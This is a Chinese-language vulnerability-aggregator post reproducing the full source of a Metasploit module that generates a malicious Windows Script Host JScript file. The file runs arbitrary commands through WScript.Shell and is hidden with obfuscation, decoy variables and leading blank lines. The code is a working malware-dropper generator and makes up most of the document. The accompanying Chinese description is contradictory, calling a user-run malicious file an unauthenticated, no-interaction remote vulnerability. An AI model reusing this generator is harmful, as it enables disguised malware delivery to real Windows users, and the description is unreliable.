Malicious Windows Script Host JScript (js) File

漏洞信息

漏洞名称: Malicious Windows Script Host JScript (.js) File

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞利用模块创建了一个恶意的Windows Script Host (WSH) JScript (.js) 文件,允许攻击者在目标系统上执行任意命令。Windows Script Host是一个在Windows操作系统中执行脚本的技术,广泛用于自动化任务和脚本执行。此漏洞的利用不需要用户交互,只需用户执行恶意的.js文件即可触发。

漏洞的技术根源在于Windows Script Host对JScript文件的处理机制,特别是通过ActiveXObject调用WScript.Shell执行命令的方式。攻击者可以通过构造特定的JScript代码,利用这一机制在目标系统上执行任意命令,从而实现远程代码执行。

此漏洞的影响极为严重,因为它允许攻击者在无需任何用户认证的情况下,远程执行任意命令,可能导致数据泄露、服务中断或其他恶意活动。由于Windows Script Host在Windows系统中的广泛使用,这一漏洞的影响范围非常广泛,几乎所有从Windows 98开始的Windows版本都可能受到影响。

产品厂商: Microsoft

产品名称: Windows Script Host

影响版本: Microsoft Windows 98 or newer

来源: https://github.com/rapid7/metasploit-framework/blob/12340ef6b5d418c39db9f8c6eeb4a96b30c0cc80/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_script_host_jscript.rb

类型: rapid7/metasploit-framework:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Script Host JScript (.js) File',
        'Description' => %q{
          This module creates a Windows Script Host (WSH) JScript (.js) file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 98 or newer', {}
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1998-06-25', # Windows 98 release date
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The JScript file name.', 'msf.js']),
      OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
    ])

    register_advanced_options([
      OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious JScript.', 100]),
    ])
  end

  def generate_jscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
    js = ''

    # TODO: This could be improved by generating more realistic looking
    # benign code with functions and flow control
    if prepend_benign_code
      rand(5..10).times do
        js << "var #{rand_text_alpha(6..16)}=\"#{rand_text_alphanumeric(6..16)}\";\r\n"
      end
    end

    js << "\r\n" * prepend_new_lines

    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    #       the specified ARCH_CMD payload is a string of commands
    #       (not a single command).
    if escaped_payload.include?(' & ')
      cmd = "cmd.exe /c #{escaped_payload}"
    else
      cmd = escaped_payload
    end

    shell_var = rand_text_alpha(6..16)
    js_payload = "var #{shell_var} = new ActiveXObject(\"WScript.Shell\");"
    js_payload << "#{shell_var}.Run(\"#{cmd}\");"

    if obfuscate
      js_obfu = Rex::Exploitation::JSObfu.new(js_payload)
      obfuscated_payload = js_obfu.obfuscate(memory_sensitive: false).to_s
      # WSH JScript execution context does not support 'window' object
      obfuscated_payload = obfuscated_payload.gsub('window[', 'String[')
      js << obfuscated_payload
    else
      js << js_payload
    end

    js
  end

  def exploit
    js = generate_jscript(
      payload.encoded,
      prepend_benign_code: datastore['PrependBenignCode'],
      prepend_new_lines: datastore['PrependNewLines'],
      obfuscate: datastore['OBFUSCATE']
    )
    file_create(js)
  end
end


Github Poc
#命令执行 #rapid7/metasploit-framework:github commit
Malicious Windows Script Host JScript (js) File
http://example.com/2025/07/28/github_3305986036/
作者
lianccc
发布于
2025年7月28日
许可协议